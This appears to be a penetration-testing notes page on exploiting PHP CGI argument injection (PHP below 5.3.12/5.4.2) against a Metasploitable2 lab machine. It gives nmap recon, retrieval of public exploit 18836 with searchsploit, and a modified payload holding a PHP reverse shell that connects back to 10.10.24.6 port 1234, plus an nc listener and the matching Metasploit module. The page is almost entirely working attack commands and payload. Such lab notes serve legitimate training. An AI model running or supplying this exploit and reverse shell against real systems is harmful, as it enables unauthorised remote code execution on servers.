PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection

PHP

nmap -sV -sC -p 80 10.2.20.205

80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2

Try to browse
- http://10.2.20.205/phpinfo.php

PHP Version 5.2.4-2ubuntu5.10

Manual/Script Exploitation

Find an exploit

searchsploit php cgi
	PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection | php/remote/18836.py
searchsploit -m 18836
python2 18836.py 10.2.20.205 80
# It executes

Modify pwn_code variable and insert PHP reverse shell code

vim 18836.php
# insert:
pwn_code = """<?php $sock=fsockopen("10.10.24.6",1234);exec("/bin/sh -i <&4 >&4 2>&4");?>"""
# Save and quit

# On another tab
nc -nvlp 1234

# Launch the exploit
python2 18836.py 10.2.20.205 80

Unprivileged access with "www-data" user

Automatic MSF exploit/multi/http/php_cgi_arg_injection module can be used too.

exploit/multi/http/php_cgi_arg_injection

PreviousPHP NextCVE-2021-44228 - Apache Log4j

Last updated 1 year ago